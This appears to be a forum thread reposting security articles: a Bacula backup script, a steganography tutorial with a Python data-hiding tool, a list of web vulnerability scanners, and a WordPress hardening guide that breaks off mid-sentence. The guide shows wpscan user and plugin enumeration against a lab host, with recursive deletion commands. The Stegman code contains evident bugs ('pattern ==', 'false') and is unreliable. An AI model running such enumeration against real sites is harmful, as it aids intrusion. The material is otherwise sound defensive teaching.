Connecting to Client myclient-fd at 192.168.1.5:9102 myclient-fd Version: 5.2.13 (19 February 2013) Daemon started 17-Aug-14 12:46. Jobs: run=2 running=0. Heap: heap=269,024 smbytes=112,838 max_bytes=424,393 bufs=94 max_bufs=176 Sizeof: boffset_t=8 size_t=8 debug=0 trace=0 Running Jobs: Director connected at: 18-Aug-14 00:50 No Jobs running. ==== This verifies that the connection to the client is initiated and we can now run the backup from the client bconsole. Therefore, to enable the client to initiate the backup, we have to follow the following steps: setip: execute the setip command to set the current client’s IP address. run: run the backup job. status: check the status of the backup job. A simple script that does that can be seen below. It first checks whether the baculaserverbox DNS is accessible, which is always the case in the internal network; this is also true when we’ve connected to the network via VPN. If the server is not accessible it immediately terminates the connection, otherwise it continues. Next, the script gets the current address of the tun0 interface, which corresponds to the VPN interface. If you’re using different interface on your mobile device, choose it appropriate to your needs. At last the bconsole is run, feeding it the setip, then run and at last the status commands, which set the client IP address and run the backup job. #!/bin/sh # Check if bacula server accessible. if [ ! $(dig +short baculaserverbox) ]; then echo "Backup server is not accessible." exit 1 fi # Get the current IP address. ip=$(ifconfig tun0 | grep -Eo 'inet (addr:)?([0-9]*.){3}[0-9]*' | grep -Eo '([0-9]*.){3}[0-9]*') # Set the IP address and run the backup /usr/sbin/bconsole -c /etc/bacula/bconsole.conf <<EOF setip "$ip" run job="MyClient" yes status client=myclient-fd yes EOF The only thing left is to actually run the script periodically every day – the schedule depends upon the client. In any case, a crontab entry is needed, which can be added by using the crontab entry in Linux. We can use the following crontab entry to backup files to the server every 12 hours by running the /home/user/bacula script. 0 */12 * * * bash -c '/home/user/bacula' 2>&1 > /var/log/bacula/backup-$(date +"%Y%m%d").log The crontab entry also saves the log information into the /var/log/bacula/ folder, which needs to be created and permissions changed in order for backup process to be able to save the log file. The following commands need to be run as root on the client to create the appropriate /var/log/bacula folder. # mkdir /var/log/bacula # chown user:bacula /var/log/bacula -R After that we’re all set and backup will be run every 12 hours and log written to the log file in /var/log/bacula/. A new log file will be created each day a backup is run in order to prevent infestation of the log file; saving information to separate files will keep things organized and maintainable. Conclusion In this article we’ve presented how Bacula can be used as a backup solution for mobile devices, which requires a little bit of skill, but can be a powerful backing up solution. I’ve been using Bacula as a backup solution for my laptop and a few other mobile devices without a problem for weeks and everything is working without a problem. The process of integrating Bacula as an everyday backup solution takes a bit of time, since the configuration of Bacula director, file and storage daemons are quite daunting jobs, but at the end it’s worth the effort. Once you’ve got a hang of the configuration files and how everything fits together, it will be a breeze to reconfigure Bacula to fit your needs. At the end of the day, you have to invest the time and energy in understanding the Bacula backup process and configuration files, but you get so much out of this great open-source backup solution, that’s it’s worth every minute of your time. Think about what Bacula provides for free: backup agent that works on almost any platform, scheduling mechanisms, data compression, data encryption, etc. There are other aspects of Bacula that are not as great though like lack of GUI tools: we have bat and webacula, but they are not as complete and feature-ready as they could be. Nevertheless, if you’re a Linux guru, you shouldn’t have a problem dealing with Bacula configuration files, otherwise you can contact a great many people for help, like Bacula IRC channel, Bacula mailing lists, etc. References [1] Solid-state drive, https://en.wikipedia.org/wiki/Solid-state_drive. [2] Tape drive https://en.wikipedia.org/wiki/Tape_drive. [3] List of backup software https://en.wikipedia.org/wiki/List_of_backup_software. [4] Bacula-Web, Home page of Bacula-Web - Monitoring and reporting web gui for Bacula. [5] The Bootstrap File, The Bootstrap File. [6] ESXi 5.1: Using Raw Device Mappings (RDM) on an HP Microserver, ESXi 5.1: Using Raw Device Mappings (RDM) on an HP Microserver | Forza IT. [7] Bacula Installation and Con?guration Guide, https://access.redhat.com/site/sites/default/files/attachments/install_1.pdf. [8] Overview on modifying the Synology Server, bootstrap, ipkg etc, Overview on modifying the Synology Server, bootstrap, ipkg etc - SynologyWiki. [9] Data Encryption, Data Encryption. [10] Messages Resource, Messages Resource. Source
  15. Aerosol
    Steganography is often mistaken with cryptography, but they are very different in their operations. The major similarity between them is they were coined from Greek words. steganos – covered cryptos – secret graphos – writing That gives us hidden writing for steganography and secret writing for cryptography. I will advise you read this previously written article before proceeding. Soufiane Tahiri explained some basics. Just like reconnaissance has to be done for everything we do as security professionals, we also need to gather information on files we will make use of. I’m making use of the “file” command in my Linux shell to gather information on some images here: This shows that the JPEG images are stored in JFIF format. I tried the same on other image file types and the output was: If we’ll be covering our data with some of these images, we need to have an idea of what information the image already has. After this vague meta data, I went ahead to use the exiftool to grab more data from the images. The exiftool can be used to read metadata from files like so: exiftool imagefile.jpg In my case, I have about 6 images to run that command on, so I will run the tool recursively to output all the results for image files in a folder into .txt files having the file names: exiftool -r -w .txt lab/ Now I can read each of the text files with vim. I don’t have a camera-taken photo. If you do, you can try the exiftool with it and you will get a lot more information like the camera type, date picture was taken, and more. Now we’ll study the hexadecimal values of this various image mimetypes to help us observe possible hexadecimal changes after data has been embedded in them. JPG: Both images above show that a regular JPG begins with 0xFFD8 and ends with 0xFFD9 PNG: This shows that PNG images should begin with hex value 0x89504E47 and end with 0xAE426082 BMP: Bitmap images have an inconsistency in their end values from my study, but their beginning hex values are 0x424D36 GIF: Similar to bitmaps, end values for gif images vary, but they usually begin with 0×47494638 All this information we have helps us to some extent, as some ACTIVE steganography tools will leave trails by adding extra hex values after the regular endings for the mimetype. Common Methods of Steganography Null Ciphers Physical Media File Steganography NULL CIPHERS Null ciphers are intended to confuse cryptanalysts, as they involve scrambling data by playing with words. An nth character of each word in a sentence can be used to derive a message. An example is this: Derived messages from the example null ciphers are GUN, DATA, gonzalez. In real life occurrences, these messages will be more obscure, as they wouldn’t be written in large conspicuous red fonts. The first and second examples have the messages hidden in their 1st characters, but the third case has the messages in the penultimate characters i.e n-2th character. Wikipedia gave this example: This example uses a pattern (1,2,3,1,2,3,…). For more obscurity, the nth character for the message in each word can be dynamic and still follow a pattern to be uncovered by the message receiver. Physical Steganography Steganography can be implemented in a lot of physical ways. In the ancient days, they shaved heads to tattoo messages. That is still done today. In the TV series “Prison Break”, information was written on white paper with white ink, and it had to be shaded with a gray pencil to read through. I have a similar digital implementation of this as a pen. See this Pen: A Pen by Joseph Rex You can hover your mouse around the blue border, and if you do this patiently from the extreme left to right, you will get the text I have in it, which reads, “This is some text for some amazing contents and it is not to be seen by regular viewers.” Media File Steganography There are various ways by which data can be stored in image files or other media files. I will walk through some techniques and tools that can be really useful. Windows CMD: copy /b image.jpg + data.rar endfile.jpg Data to be hidden should be zipped in a zip or rar archive. After this we run the command above, with ‘endfile.jpg’ being the name of the image file where we want the data to be stored. In my example below, I chose to use ‘output.jpg’ An output of the ‘output.jpg’ image, we’ll rename it to ‘output.rar’ and open it with WinRAR. Now that we’ve successfully read the data in output.rar, we will change the extension back to jpg. It still works fine as an image, but we have to check the hex value to see if it is like a regular image as we have performed reconnaissance on regular images earlier. This is .jpg, so we expect a start of 0xFFD8 and end of 0xFFD9. Dang! See what we have here: some extra values after FFD9. Also, we can see on the ASCII column there’s write.txt, which is the carrier of our information. Also, we have the information in the text file displayed (“This is some information to be hidden”). We try the same process with a more packaged .NET GUI program (Steganography) and get the same result. Extracting… This is very simple for those that get headaches around CLI. Back to my Linux box, let’s try some common Linux tools. Steghide: To embed data in image with Steghide, we run: steghide embed -ef sample.txt -cf image.jpg -sf output.jpg This passively stores the sample.txt data into the output.jpg file with the image.jpg as cover. ef = embed file cf = cover file sf = stegofile I referred to the embedding of Steghide as passive because when you inspect the hex values, there are no unusual changes on the file. I have just embedded data in a .jpg file, and it is still as every other .jpg file beginning with 0XFFD8 and ending with 0xFFD9. Steghide also implements crypto steganography. What’s crypto steganography? This is just as the name implies. It combines cryptographic arts to steganography by encrypting data before being covered by the media file. Steghide uses rijndaeo-128 to encrypt by default. Other usable encryption algorithms can be seen by running: steghide encinfo With Steghide, we can embed data in an audio file that has a WMV format. steghide embed -e none -ef secret.txt -cf song.wav -sf output.wav Outguess: $ outguess -k "password" -d image.jpg outguess.jpg Reading image.jpg.... JPEG compression quality set to 75 Extracting usable bits: 32622 bits Correctable message size: 20161 bits, 61.80% Encoded 'secret.txt': 1136 bits, 142 bytes Finding best embedding... 0: 581(49.7%)[51.1%], bias 474(0.82), saved: -1, total: 1.78% 3: 575(49.2%)[50.6%], bias 383(0.67), saved: 0, total: 1.76% 33: 572(49.0%)[50.4%], bias 346(0.60), saved: 0, total: 1.75% 105: 533(45.6%)[46.9%], bias 381(0.71), saved: 4, total: 1.63% 105, 914: Embedding data: 1136 in 32622 Bits embedded: 1168, changed: 533(45.6%)[46.9%], bias: 381, tot: 32543, skip: 31375 Foiling statistics: corrections: 217, failed: 2, offset: 51.654867 +- 138.564823 Total bits changed: 914 (change 533 + bias 381) Storing bitmap into data... Writing outguess.jpg.... Outguess also works smoothly and leaves no appended data in the JFIF standard hex value. To extract embedded text: $ outguess -r outguess.jpg mysecret.txt Building your own steganography tool A lot of steganography tools use the LSB (Least Significant Bit) Algorithm. Some use the enhanced LSB. LSB best works with BMP (Bitmap) files because they use loss-less compression. The best we can use are the 24 bit BMP files because of their small size. Some chose to use even smaller like 8 bit. A tool like steghide we used is not limited to BMP images and it works fine with other image file types. The LSB algorithm had been exploited as it is still a replacement technique that had been implemented. Building a steganography tool requires that you know some techniques involved. I know of two major techniques, which are: Replacement Technique Appending Technique Earlier in the article, I referred to replacement techniques as passive and appended techniques as active. That’s because it’s the best way I can think of them. Using the first windows steganography method with WinRAR, we appended data to the image as we saw in our inspected hex values. For Steghide, we found no significant tampering in the hex code because it implements a replacement technique. LSB in a binary data is usually the 8th bit which has a decimal value of 1 and the MSB (Most Significant Bit) is that with the 128 decimal value. 1 1 1 1 1 1 1 1 1 = 128 1 = 64 1 = 32 1 = 16 1 = 8 1 = 4 1 = 2 1 = 1 By tampering with this 8th bit for each ASCII representation of our image, we can store our arbitrary content in them and it wouldn’t make a significant change in the tampered file (cover file). If we have a cover image with binary: 11001011 00101110 10100110 Tampering with the LSB will result in: 11001011 00101111 10100111 A bothering question will be “Which bytes should be selected for LSB replacement?” There are algorithms that use sequential selections and some use pseudo random selections. Each of these will contain our bits of our embedded data. For the tool we will be building we will use the appending technique. The program will be called Stegman and it will be written in Python. Before we start writing our program, I like to think of the workflow of my problem in plain words before a code implementation, and we will go through the two major functions to be performed by the problem: embedding data and extracting embedded data. The program checks the hexadecimal values of a JPG file to see if there is extra data after 0xFFD9, and for PNG files, it checks for data after 0×426082. If extra data is found, it means that data has been embedded to image. If none is found, it allows its user to embed data which is appended after the regular hex ending for the image type. In extraction cases, we check for files after the expected hex endings again and convert them if existing to ASCII and store in a file specified by the user. I’ll start by importing required modules for the program: import sys, re, binascii, string Next, we need a little function to get hexadecimal code from images: def gethex(image): f = open(image, 'rb') data = f.read() f.close() hexcode = binascii.hexlify(data) return hexcode Another function to check if there is appended data to image hexadecimal: def extradatacheck(data, type): if type == 'png': pattern = r'(?<=426082)(.*)' elif type == 'jpg': pattern == r'(?<=FFD9)(.*)' match = re.search(pattern, data) if match: return match.group(0) else: false The extract and embed functions rely on those functions. In the check above, I used a regex look behind to check for characters after 0xFFD9 in cases of JPG images and 0×426082 in cases of PNG images, as our program is meant to work with only these two formats. The Embed function: def embed(embedFile, coverFile, stegFile): filetype = coverFile[-3:] stegtype = stegFile[-3:] if filetype != 'png' and filetype != 'jpg': print 'Invalid format' elif filetype != stegtype: print 'Output file has to be in the same format as cover image (%s)' % string.swapcase(filetype) else: data = open(embedFile, 'r').read() info = gethex(coverFile) if extradatacheck(info, filetype): print 'File already contains embedded data' else: info += data.encode('hex') f = open(stegFile, 'w') f.write(binascii.unhexlify(info)) f.close() print 'Storing data to', stegFile The function enforces that the user only makes use of PNG and JPG images. It also ensures the user stores the stego output in a format the same as the cover image. It then checks if the file already has embedded data based on our appending technique. If there is data already found, the program quits telling the user that it has found already embedded data. The Extract function def extract(stegFile, outFile): filetype = stegFile[-3:] data = gethex(stegFile) if extradatacheck(data, filetype): store = open(outFile, 'w') store.write( binascii.unhexlify(extradatacheck(data, filetype)) ) store.close() print 'Extracted data stored to', outFile else: print 'File has no embedded data in it' Once again we check to see if there is any appended data. If there is, we open the specified storage file and store the embedded file in it after it has been converted from hex to ASCII. To get this complete tool, it can be downloaded with this article. To see how the tool works, run: python stegman.py –h Advanced Steganography Case Study Challenge 7 of the Python challenge presents a case where data has to be found in a given image. We have the following image to extract a word from in order to get to the next challenge. This requires that we use the PIL (Python Image Library) to grab what the data is. The data is hidden in pixels of this image. I’ll give a little code hint on finding the hidden data, but I will not give a complete solution to avoid making this a spoiler for the challenge. >>> import Image >>> img = Image.open('file.png') >>> img.size (629, 95) >>> img.getpixel( (0, 50) ) (115, 115, 115, 255) >>> chr(115) 's' This is just little information we can get on the case image. With more manipulations on this, we will get a resulting string that is plausible as a message. References Steganography. Steganography http://www.pythonchallenge.com/ Steganography: What your eyes don’t see - InfoSec Institute Steganography and Steganalysis: Common Image Formats and LSB - InfoSec Institute Source
  16. Aerosol
    In the past, many popular websites have been hacked. Hackers are now active and always try to hack websites and leak data. This is why security testing of web applications is very important. And here comes the role of web application security scanners. Web Application Security Scanner is a software program which performs automatic black box testing on a web application and identifies security vulnerabilities. Scanners do not access the source code, they only perform functional testing and try to find security vulnerabilities. Various paid and free web application vulnerability scanners are available. In this post, we are listing the best free open source web application vulnerability scanners. I am adding the tools in random order. So please do not think it is a ranking of tools. I am only adding open source tools which can be used to find security vulnerabilities in web applications. I am not adding tools to find server vulnerabilities. And do not confuse with free tools and open source tools. Because there are various other tools available for free, but they do not provide source code to other developers. Open source tools are those which offer source codes to developers so that developers can modify the tool or help in further development. These are the best open source web application penetration testing tools: Grabber Grabber is a nice web application scanner which can detect many security vulnerabilities in web applications. It performs scans and tells where the vulnerability exists. It can detect the following vulnerabilities: Cross site scripting SQL injection Ajax testing File inclusion JS source code analyzer Backup file check It is not fast as compared to other security scanners, but it is simple and portable. This should be used only to test small web applications because it takes too much time to scan large applications. This tool does not offer any GUI interface. It also cannot create any PDF report. This tool was designed to be simple and for personal use. You can try this tool just for personal use. If you are thinking of it for professional use, I will never recommend it. This tool was developed in Python. And an executable version is also available if you want. Source code is available, so you can modify it according your needs. The main script is grabber.py, which once executed calls other modules like sql.py, xss.py or others. Download it here: Grabber! Like a Petit Pimouss' Source code on Github: https://github.com/neuroo/grabber Vega Vega is another free open source web vulnerability scanner and testing platform. With this tool, you can perform security testing of a web application. This tool is written in Java and offers a GUI based environment. It is available for OS X, Linux and Windows. It can be used to find SQL injection, header injection, directory listing, shell injection, cross site scripting, file inclusion and other web application vulnerabilities. This tool can also be extended using a powerful API written in JavaScript. While working with the tool, it lets you set a few preferences like total number of path descendants, number of child paths of a node, depth and maximum number of request per second. You can use Vega Scanner, Vega Proxy, Proxy Scanner and also Scanner with credentials. If you need help, you can find resources in the documentation section: Documentation: https://subgraph.com/vega/documentation/index.en.html Download Vega: https://subgraph.com/vega/ Zed Attack Proxy Zed Attack Proxy is also known as ZAP. This tool is open source and is developed by AWASP. It is available for Windows, Unix/Linux and Macintosh platforms. I personally like this tool. It can be used to find a wide range of vulnerabilities in web applications. The tool is very simple and easy to use. Even if you are new to penetration testing, you can easily use this tool to start learning penetration testing of web applications. These are the key functionalities of ZAP: Intercepting Proxy Automatic Scanner Traditional but powerful spiders Fuzzer Web Socket Support Plug-n-hack support Authentication support REST based API Dynamic SSL certificates Smartcard and Client Digital Certificates support You can either use this tool as a scanner by inputting the URL to perform scanning, or you can use this tool as an intercepting proxy to manually perform tests on specific pages. Download ZAP : zaproxy - OWASP ZAP: An easy to use integrated penetration testing tool for finding vulnerabilities in web applications. - Google Project Hosting Wapiti Wapiti is also a nice web vulnerability scanner which lets you audit the security of your web applications. It performs black-box testing by scanning web pages and injecting data. It tries to inject payloads and see if a script is vulnerable. It supports both GET and POSTHTTP attacks and detects multiple vulnerabilities. It can detect following vulnerabilities: File Disclosure File inclusion Cross Site Scripting (XSS) Command execution detection CRLF Injection SEL Injection and Xpath Injection Weak .htaccess configuration Backup files disclosure and many other Wapiti is a command-line application. So, it may not be easy for beginners. But for experts, it will perform well. For using this tool, you need to learn lots of commands which can be found in official documentation. Download Wapiti with source code: Wapiti : a Free and Open-Source web-application vulnerability scanner in Python for Windows, Linux, BSD, OSX W3af W3af is a popular web application attack and audit framework. This framework aims to provide a better web application penetration testing platform. It is developed using Python. By using this tool, you will be able to identify more than 200 kinds of web application vulnerabilities including SQL injection, Cross-Site Scripting and many others. It comes with a graphical and console interface. You can use it easily by using its easy to understand interface. If you are using it with Graphical Interface, I do not think that you are going to face any problem with the tool. You only need to select the options and then start the scanner. If a website needs authentication, you can also use authentication modules to scan the session-protected pages. We have already covered this tool in detail in our previous W3af walkthrough series. You can read those articles to know more about this tool. You can access source code at the Github repository: https://github.com/andresriancho/w3af/ Download it from the official website: w3af - Open Source Web Application Security Scanner WebScarab WebScarab is a Java-based security framework for analyzing web applications using HTTP or HTTPS protocol. With available plugins, you can extend the functionality of the tool. This tool works as an intercepting proxy. So, you can review the request and response coming to your browser and going to thw server. You can also modify the request or response before they are received by server or browser. If you are a beginner, this tool is not for you. This tool was designed for those who have a good understanding of HTTP protocol and can write codes. Webscarab provides many features which helps penetration testers work closely on a web application and find security vulnerabilities. It has a spider which can automatically find new URLs of the target website. It can easily extract scripts and HTML of the page. Proxy observes the traffic between server and your browser, and you can take control of the request and response by using available plugins. Available modules can easily detect most common vulnerabilities like SQL injection, XSS< CRLF and many other vulnerabilities. Source code of the tool is available on Github: https://github.com/OWASP/OWASP-WebScarab Download WebScarab here: https://www.owasp.org/index.php/Category:OWASP_WebScarab_Project Skipfish Skipfish is also a nice web application security tool. It crawls the website and then check each pages for various security threats and at the end prepares the final report. This tool was written in C. It is highly optimized for HTTP handling and utilizing minimum CPU. It claims that it can easily handle 2000 requests per second without adding a load on CPU. It use a heuristics approach while crawling and testing web pages. This tool also claims to offer high quality and less false positives. This tool is available for Linux, FreeBSD, MacOS X and Windows. Download Skipfish or code from GOogle Codes: skipfish - web application security scanner - Google Project Hosting Ratproxy Ratproxy is also an open source web application security audit tool which can be used to find security vulnerabilities in web applications. It is supports Linux, FreeBSD, MacOS X, and Windows (Cygwin) environments. This tool is designed to overcome the problems users usually face while using other proxy tools for security audits. It is capable of distinguishing between CSS stylesheets and JavaScript codes. It also supports SSL man in the middle attack, which means you can also see data passing through SSL. You can read more about this tool here: RatproxyDoc - ratproxy - Project documentation - passive web application security assessment tool - Google Project Hosting Download ratproxy - passive web application security assessment tool - Google Project Hosting SQLMap SQLMap is another popular open source penetration testing tool. It automates the process of finding and exploiting SQL injection vulnerability in a website’s database. It has a powerful detection engine and many useful features. So, a penetration tester can easily perform SQL injection check on a website. It supports range of database servers including MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB. It offers full support to 6 kinds of SQL injection techniques: time-based blind, boolean-based blind, error-based, UNION query, stacked queries and out-of-band. Access the source code on Github repository: https://github.com/sqlmapproject/sqlmap Download SQLMap here: https://github.com/sqlmapproject/sqlmap Wfuzz Wfuzz is another freely available open source tool for web application penetration testing. It can be used to brute force GET and POST parameters for testing against various kinds of injections like SQL, XSS, LDAP and many others. It also supports cookie fuzzing, multi-threading, SOCK, Proxy, Authentication, parameters brute forcing, multiple proxy and many other things. You can read more about the features of the tool here: Google Project Hosting This tool does not offer a GUI interface, so you will have to work on command line interface. Download Wfuzz from code.google.com: Google Project Hosting Grendel-Scan Grendel-Scan is another nice open source web application security tool. This is an automatic tool for finding security vulnerabilities in web applications. Many features are also available for manual penetration testing. This tool is available for Windows, Linux and Macintosh. This tool was developed in Java. Download the tool and source code: Grendel-Scan | SourceForge.net Watcher Watcher is a passive web security scanner. It does not attack with loads of requests or crawl the target website. It is not a separate tool but is an add-on of Fiddler. So you need to first install Fiddler and then install Watcher to use it. It quietly analyzes the request and response from the user-interaction and then makes a report on the application. As it is a passive scanner, it will not affect the website’s hosting or cloud infrastructure. Download watcher and its source code: Watcher: Web security testing tool and passive vulnerability scanner - Home X5S X5s is also a Fiddler add-on which aims to provide a way to find cross-site scripting vulnerabilities. This is not an automatic tool. So, you need to understand how encoding issues can lead to XSS. You need to manually find the injection point and then check where XSS can be in the application. We have covered the X5S in a previous post. So, you can refer to that article to read more about X5S and XSS. Download X5S and source code from codeplex: x5s - test encodings and character transformations to find XSS hotspots - Home You can also refer to this official guide to know how to use X5S: x5s - test encodings and character transformations to find XSS hotspots - Documentation Arachni Arachni is an open source tool developed for providing a penetration testing environment. This tool can detect various web application security vulnerabilities. It can detect various vulnerabilities like SQL Injection, XSS, Local File inclusion, remote file inclusion, unvalidated redirect, and many others. Download this tool here: Home - Arachni - Web Application Security Scanner Framework Final Word These are the best open source web application security testing tools. I tried my best to list all the tools available online. If a tool was not updated for many years, I did not mention it here. Because if a tool is more than 10 years old, it can create compatibility issues in the recent environment. If you are a developer, you can also join the developers’ community of these tools and help these tools to grow. By helping these tools, you will also increase your knowledge and expertise. If you want to start penetration testing, I will recommend using Linux distributions which have been created for penetration testing. These environments are backtrack, gnacktrack, backbox and blackbuntu. All these tools come with various free and opensource tools for website penetration testing. So, you can go with those environments. Source
  17. Aerosol
    Introduction In this article we’re going to take a look at how to secure a WordPress installation against attackers in an IaaS virtual machine. Virtual machines can be rented with various IaaS cloud providers, and only a credit card is needed to actually rent a virtual machine, which is quite cheap nowadays. There are multiple reasons to run your own WordPress website on an IaaS environment rather than using a WordPress hosting with one of multiple providers. One of the advantages is greater flexibility, since you can do practically anything with your instance of virtual machine. Additionally, you can setup additional services on the same virtual host if the need arises. On the other hand, there are some risks when running your own version of WordPress website, since you have to protect it by yourself and you can’t rely on the hosting provider to do it for you. At the same time, you should also be aware of the fact that some providers don’t actually secure WordPress the way they should, and you can’t do it by yourself, since you don’t have appropriate access. The problem is that they don’t know your needs and leave all the dangerous files like xmlrpc.php intact in case you might need them. Therefore it’s best to assume that we alone are the most appropriate person to secure the WordPress installation in the most secure way. Next we’ll take a look at the security threats of WordPress installations and determine how to protect against them. Let’s take a look at what an attacker can gather from a WordPress website, and later on we’ll provide security mitigations we have to apply to secure ourselves. Discovering WordPress Version: the wpscan program scans for the /readme.html file, which is present by default when installing WordPress and contains a lot of information regarding its version. There are also other files that disclose the version of installed WordPress, which an attacker can use to determine whether it contains any vulnerabilities. To mitigate this, we have to remove the readme.html file and install the All in One WP Security plugin, which will hide the WordPress version in other files. Enumerate WordPress Users: the wpscan program can be used to enumerate all users on the WordPress website. By enumerating existing users, an attacker might issue a bruteforce/dictionary attack on the users to determine their password, in which case he can login to the administrative interface provided by WordPress. Enumerate WordPress Plugins: the wpscan program can be used to enumerate all plugins on the WordPress website. By enumerating the installed plugins, an attacker can find a vulnerability in an unpatched version of a plugin to gain complete access to the WordPress website. WordPress Vulnerabilities: we have to ensure the latest version of WordPress is installed in order to keep it up-to-date. Unpatched versions of WordPress installations may contain a different vulnerability an attacker might use to exploit the website. Using XML-RPC Interface: attackers have lately been using xml-rpc interface for various attacks, from bruteforcing passwords of users as well as using it for DoS attacks. Denial of Service: an attacker can issue multiple subsequent requests to the WordPress website in order to cause a denial of service, in which case the website won’t be accessible anymore. DoS can disrupt business procedures, which causes the enterprise to lose money every time the website is inaccessible. Clickjacking: a clickjacking attack is an attack where an attacker uses an iframe element to embed a web page into another page and tricking the user into clicking on the button or link of an embedded page while viewing the contents of the top page. Administrative Interface: the /wp-admin/ interface is usually enabled on WordPress installation and allows user to login to the WordPress and administer the web site. In order to secure WordPress, we have to enable logging into the web interface only from specific IP addresses and prevent access from arbitrary IP addresses. Protecting against Discovering WordPress Version We’ve already said that WordPress version can be discovered simply by visiting the http://192.168.1.2/readme.html, which is presented on the picture below, where it’s evident that we’re running WordPress Version 3.5. To mitigate the issue, we have to remove the readme.html file from the DocumentRoot of the WordPress website. But even after deleting that file, the WordPress version can still be discovered by visiting the http://192.168.1.2/ website and viewing the website source code. On the picture below we can see that the WordPress version is disclosed. There are different resources on the web where it’s clearly presented how a version can be removed from a source code: one such resource is here. Protecting against Enumerating WordPress Users The wpscan tool can be used to enumerate users of the WordPress website, which can later be bruteforced easily. The tool needs to be run with the following parameters to successfully enumerate the users: # wpscan --enumerate u --url http://192.168.1.2 A successfully enumerated username admin can be seen on the picture below. Authors can be enumerated by using the http://192.168.1.2/?author=1 request, where the author ID has to be increased by 1 in every iteration. The website displayed under such URL is presented below, where it’s evident that a user admin has been discovered. To prevent attackers from enumerating users, we have to enable rewrite conditions, where have to add the following to the .htaccess file: RewriteCond %{REQUEST_URI} ^/$ RewriteCond %{QUERY_STRING} ^/?author=([0-9]*) RewriteRule ^(.*)$ http://192.168.1.1/ [L,R=301] Then we have to enable the mod_rewrite module and restart Apache by running the commands below: # a2enmod rewrite # /etc/init.d/apache2 restart Protecting against Enumerating WordPress Plugins The wpscan tool can be used to enumerate users of the WordPress website, which can later be used to identify different vulnerabilities in the website. A vulnerability can be used by an attacker to steal sensitive information from a website, to use the vulnerability for a social engineering attack, or possibly take total control of the website. The wpscan tool searches for readme.html files in the plugin’s home directory under /wp-content/plugins/ directory. To enumerate plugins on the WordPress website, we have to use the command below: # wpscan --enumerate u --url http://192.168.1.2 A successfully enumerated plugin can be seen below, where a number of plugins were identified: akismet, my-category-order, nospampti and upm-polls. We can see that wpscan automatically displayed a number of security advisories notifying us about existing vulnerabilities present in the installed version of WordPress. [!] The WordPress 'http://192.168.1.2/readme.html' file exists [+] WordPress version 3.5 identified from meta generator [!] 5 vulnerabilities identified from the version number: | | * Title: WordPress 3.4 - 3.5.1 /wp-admin/users.php Malformed s Parameter Path Disclosure | * Reference: http://seclists.org/fulldisclosure/2013/Jul/70 | * Reference: http://osvdb.org/95060 | * Fixed in: 3.5.2 | | * Title: WordPress 3.4 - 3.5.1 DoS in class-phpass.php | * Reference: http://seclists.org/fulldisclosure/2013/Jun/65 | * Reference: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2173 | * Reference: http://secunia.com/advisories/53676 | * Reference: http://osvdb.org/94235 | | * Title: WordPress 3.3.2 - 3.5 Cross-Site Scripting (XSS) (Issue 3) | * Reference: https://github.com/wpscanteam/wpscan/wiki/WordPress-3.5-Issues | | * Title: XMLRPC Pingback API Internal/External Port Scanning | * Reference: https://github.com/FireFart/WordPressPingbackPortScanner | | * Title: WordPress XMLRPC pingback additional issues | * Reference: http://lab.onsec.ru/2013/01/WordPress-xmlrpc-pingback-additional.html [+] WordPress theme in use: twentytwelve v1.1 | Name: twentytwelve v1.1 | Location: http://192.168.1.2/wp-content/themes/twentytwelve/ [+] Enumerating installed plugins ... [+] We found 4 plugins: | Name: akismet v2.5.6 | Location: http://192.168.1.2/wp-content/plugins/akismet/ | Readme: http://192.168.1.2/wp-content/plugins/akismet/readme.txt | Name: my-category-order | Location: http://192.168.1.2/wp-content/plugins/my-category-order/ | | * Title: My Category Order <= 2.8 - <a title="SQL Injection" href="http://resources.infosecinstitute.com/sql-injection/">SQL Injection</a> Vulnerability | * Reference: http://www.exploit-db.com/exploits/9150/ | Name: nospampti v1.0 | Location: http://192.168.1.2/wp-content/plugins/nospampti/ | Directory listing enabled: Yes | Readme: http://192.168.1.2/wp-content/plugins/nospampti/readme.txt | | * Title: NOSpamPTI 2.1 - wp-comments-post.php comment_post_ID Parameter SQL Injection | * Reference: http://packetstormsecurity.com/files/123331/ | * Reference: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5917 | * Reference: http://osvdb.org/97528 | * Reference: http://www.exploit-db.com/exploits/28485/ | Name: upm-polls v1.0.4 | Location: http://192.168.1.2/wp-content/plugins/upm-polls/ | Directory listing enabled: Yes | Readme: http://192.168.1.2/wp-content/plugins/upm-polls/readme.txt | | * Title: UPM-POLLS 1.0.4 - BLIND SQL injection | * Reference: http://www.exploit-db.com/exploits/18231/ In order to prevent the wpscan tool from enumerating the plugin version, we have to know how the wpscan tool finds that information. If you look at the source code of the tool, you can quickly determine that it tries to find the readme.html, readme.txt and changelog.txt files available in every plugin directory. The tool uses a dictionary file /usr/share/wpscan/data/plugins.txt, which contains 2205 number of plugin names to determine whether the URL address http://site/wp-content/plugins/<plugin_name>/readme.html is accessible (the <plugin_name> variable needs to be replaced by the actual name of the plugin as contained in the plugins.txt file). Therefore, to protect against the wpscan tool, we have to delete every occurrence of the readme.html, readme.txt, as well as the changelog.txt file in the DocumentRoot of the WordPress installation. We can do that effectively by running the following command. # find /var/www/ -name readme.html -exec rm {} ; # find /var/www/ -name readme.txt -exec rm {} ; # find /var/www/ -name changelog.txt -exec rm {} ; After that we can rescan the WordPress website by using the same wpscan command at which time we’ll find out the tool wasn’t able to determine the versions of available plugins. It’s important to understand that the wpscan can still find the available plugins, but won’t be able to determine their versions with 100% accuracy. There are other techniques an attacker might use in order to determine the version of installed plugins, which are the following: Matching File Names: an attacker can look at the SVN repository of the plugin to determine if any files have been added/removed when moving from one version to the next. He can see information about the presence of certain files to determine the plugin version. Matching Response Body: an attacker can directly access all the files available by the plugin and remember the returned results. After that he can compare the returned results with the results returned from different versions of the plugin in question, which he can download from the SVN repository. By matching the responses of one version of the WordPress plugin against the other version, he can determine whether the results differ, in which case he can determine the version of the plugin. It’s imperative to understand that by masking the plugin versions from the attacker, he will still be able to exploit vulnerabilities in plugins to gain access to the website; this is true, because if an old version of a plugin is installed, the vulnerability is contained in the same source file. We have to understand that the only possible solution to prevent an attacker from using the vulnerabilities is by constantly updating the plugins to the latest version available. Protecting against WordPress Vulnerabilities WordPress has a number of vulnerabilities which keep getting discovered from time to time. It’s impossible to predict how many vulnerabilities will be discovered in the future, so we must constantly upgrade WordPress to a new release when it becomes available to mitigate the newly discovered vulnerabilities. One such vulnerability is the CVE-2013-0235 vulnerability and is present in WordPress versions prior to 3.5.1. The 